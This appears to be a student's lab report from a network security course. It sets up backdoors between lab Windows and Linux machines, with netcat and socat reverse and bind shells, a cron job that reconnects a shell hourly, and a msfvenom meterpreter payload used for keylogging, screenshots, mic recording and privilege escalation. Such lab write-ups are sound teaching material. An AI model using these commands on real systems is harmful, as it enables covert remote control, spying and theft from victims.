一.基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式?
- 我们在安装常用应用软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统
2.例举你知道的后门如何启动起来(win及linux)的方式?
- windows:直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
- linux:设置了cron启动,在到达规定的时间时后门启动
3.Meterpreter有哪些给你映像深刻的功能?
- 可以获取目标主机摄像头!虽然后面的实验中我并没有成功,但是看别人的博客里都成功了,还是很可怕的
- 可以截图,万一一个涉密机被装了后门程序,那秘密文件岂不是被轻而易举地泄露了
- 其实它的每一个功能都让人感到害怕
4.如何发现自己有系统有没有被安装后门?
- 一般的后门程序都会被杀毒软件查杀,比如实验中的后门程序就被电脑管家消灭了,能被查杀的后门是不是不多了?
- 对于厉害的后门,可以及时监控进程是否异常,数据流异常以及开机自启动项,看看有没有消耗cpu特别大的进程。
二.常用后门工具实验过程
2.1 Windows获得Linux Shell
1.在Win下,先使用ipconfig
指令查看本机IP:172.30.6.22
2.使用ncat.exe
程序监听4308
端口:ncat -l -p 4308
3.Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh
命令去连接Win的4308端口。
4.连接成功后就可以在Win的cmd
窗口中输入Linux的命令,此时已经获取了Linux的shell。
2.2 Linux获得Win Shell
1.在Linux下使用ifconfig
命令查看本地主机IP:172.30.5.236
2.在Linux使用ncat.exe
程序监听4308
端口:nc -l -p 4308
3.Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口
命令去连接Linux的4308
端口:ncat.exe -e cmd.exe 172.30.5.236 4308
4.连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。
两个步骤类似,只是执行命令的主机相反。
2.3使用nc传输数据
netcat根据课上所学简单来讲,就是利用tcp、udp连接进行基本的数据收发,在两台主机之间传输字符文件之类的,所以我们在这里尝试用它在win和linux之间做一个后门。
1.Win使用ncat.exe -l 4308
命令监听本机的4308
端口。
2.Linux使用nc 172.30.5.22 4308
命令去连接Win的4308
端口,其中的ip地址应为linux的ip地址。
3.连接成功后即可传输数据,在linux终端输入的字符可以出现在win终端,而在win终端输入的字符也会出现在linux终端。如上图
4.也可以利用如下命令将文件里的内容作为输入,写入到另一台主机的文件里
nc -l 1234 > filename.out
nc host.example.com 1234 < filename.in
2.4 nc定时启动
1.ncat.exe -l -p 4308
win运行ncat.exe监听4308
端口。(忘记截图)
2.crontab -e
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。因为是第一次编辑,所以会提示选择编辑器,我们选择3
,利用最基本的vim编辑器进行编辑。
(再次忘记截图,因为当时卡在了怎么编辑文件,看到了某一个学姐的博客之后才知道,还是基础知识掌握得不牢固,很不牢固,但是会加油的)
按a
进入编辑状态,在文件最后一行添加18 * * * * /bin/netcat 172.30.6.22 4308 -e /bin/sh
表示在每个小时的第18分钟反向连接win的4308
端口。
添加完后:wq
存盘退出,配置即生效。
3.当时间到了18分时,win已经获得了linux的shell,可以输入ls等指令,而在18分以前,终端里是不会有任何反应的。
2.5 使用socat获取主机shell
1.在Win系统下,打开控制面板->系统和安全->管理工具->任务计划程序,创建任务,填写任务名称20154308
新建一个触发器,设置如下
2.下载socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files](老师的讲义里给的附件)
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4308 exec:cmd.exe,pty,stderr
3.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:
4.此时,在linux终端输入指令socat - tcp:172.30.6.22:4308
,这里的第一个参数-代表标准的输入输出,第二个流连接到Wind主机的4308端口,此时可以发现已经成功获得了一个win shell:
2.6体验Meterpreter的功能
1.生成后门程序msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.236 LPORT=4308 -f exe > 20154308_backdoor.exe
2.将生成的后门程序传送到Win主机上ncat.exe -lv 4308 > 20154308_backdoor.exe
3.在linux上使用msfconsole指令进入msf控制台,进行一系列如下设置
msfconsole
进入msf(图案好像会不一样,但是不太清楚是啥)
use exploit/multi/handler
进入handler模式
set payload windows/meterpreter/reverse_tcp
设置payload
set LHOST 172.30.5.236
设置LHOST
set LPORT 4308
设置LPORT
show options
查看当前信息状态
exploit
msf开始监听
4.20154308_backdoor.exe
在win上打开后门程序
5.然后可以发现linux已经获得了Win shell
6.接下来就可以利用msf做一些有趣的事情
record_mic
录音
webcam_snap
拍照(可惜没有成功)
screenshot
截屏
使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录:
先使用getuid
指令查看当前用户,使用getsystem
指令进行提权,如图所示,提权成功
三.实验遇到的问题
3.1 后门程序传送到win后,win无法打开后门程序
- 稍微一想就会知道肯定是杀毒软件的作用。所以打开虚拟机上的电脑管家,可以看到我们所生成的后门程序
20154308_backdoor.exe
被查杀了 - 所以我们选择恢复,然后就可以在指定文件夹里找到这个程序了
- 可以正常打开后门程序了
3.2 无法使用摄像头进行偷拍,很是难过,检查过设备管理器,确实是没有摄像头设备
- 尝试过在虚拟机->可移动设备->Chiconyxxxxxxxxx这里选择连接主机,然而我的虚拟机里并没有chicony这个选项可以让我连接主机。失败
- 尝试过在物理机的计算机管理->服务里启用所有与虚拟机相关的服务,然而并没有反应。失败
- 最后一个方法,我没骨气的选择了放弃
四.实验总结
- 有趣但是很恐怖,可能我在做实验的时候就被人监视着一切(但是好像也没什么人会特地去监视我哈)
- 杀毒软件确实还是有一点用的,不知道在后面了解到免杀实验后我还会不会这么想
- 这次的实验是比较简单?我写完博客就能掌握一些东西了,不像上次做完实验,其实还是云里雾里,上了实验课之后才差不多明白一点。是我变厉害了?哈哈哈哈
- 昨天听一个学长说,网络对抗这门课虽然课上听不懂(是真的听不懂,一节课下来不知道自己听到了什么),但是课下对照着实验指导书和别人写的博客,实际操作还是蛮有意思的。我现在不仅是觉得有意思,更觉得自己能从实际操作中掌握到一点点点点知识了,没白学吧这个课,就是希望以后在课堂上能再听懂多一点东西